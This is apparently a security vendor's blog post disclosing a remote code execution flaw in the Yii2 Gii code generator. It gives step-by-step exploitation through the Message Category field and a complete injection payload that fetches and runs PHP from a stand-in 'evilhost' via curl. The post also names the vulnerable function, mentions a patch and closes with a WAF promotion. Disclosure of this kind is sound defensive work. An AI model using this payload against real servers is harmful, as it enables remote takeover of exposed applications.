This article is written specifically for web developers who use a module. We will tell you how we got access to sensitive data on a staging server through Yii2 Gii Remote Code: First to the testing environment, and then to the production. Spoiler: We have notified the module developer about the problem and it will be fixed soon. A temporary patch is available on GitHub.
Ā
Gii is a module used to automatically generate code that implements some common website features: https://yiiframework.com.ua/ru/doc/guide/2/start-gii/
Ā
Let's get started.
Ā
The packages we use:Ā
"yiisoft/yii2-debug": "~2.1.0",
"yiisoft/yii2-gii": "^2.2",
"yiisoft/yii2-faker": "~2.0.0",
Yii2 Framework 2.0.35
Ā
You can find Gii at the addresses like:
https://localhost/index.php?r=gii%2Fdefault%2Findex https://localhost/gii/
To successfully exploit the vulnerability, go to the Model Generator section.
The application must have a database configured, otherwise the model cannot be generated.Ā
Also, you must specify the existing table name in the Table Name field.Ā
The remaining fields can be filled arbitrarily up to the Enable I18N checkbox.
Once you select it, the Message Category field appears.
That's exactly where the vulnerability is hidden:
aaa', 'a'),];}}system('curl https://evilhost/b|php');__halt_compiler(); Click Preview, then click Generate. The answer should be:
The code has been generated successfully.
And next there will be data on successful generation, including a path to the model.
The vulnerability exists due to insufficient filtering of incoming parameters in the generateString function of the yiisoft/yii2-gii/src/Generator.php#L505 file. The $ this->messageCategory parameter is not filtered and allows you to embed arbitrary php code into the model file.
Here is an example file with embedded php code:
To execute arbitrary code, you need to enter the created model it in the Model Class field of the Form Generator section. This vulnerability can be exploited in any type of code generation with the Enable I18N option available.
Since the vulnerability still exists, those who use the Yii2 Gii Remote Code module need to check the following:
We would also like to note that developers should not underestimate access to their staging server, as it can help attackers gain access to their resources.
Start your Wallarm WAF trial for free today: sales@wallarm.ru
Is an AI-to-AI attack scenario a science fiction possibility only for blockbusters like the Terminator…
Lefteris Tzelepis, CISO at Steelmet /Viohalco Companies, was shaped by cybersecurity. From his early exposure…
This is a predictions blog. We know, we know; everyone does them, and they can…
The attack landscape has been dynamic following the disclosure of the React Server Components RCE…
As the year draws to a close, itās worth pausing to look back on what…
On December 3, 2025, React maintainers disclosed a critical unauthenticated remote code execution (RCE) vulnerability…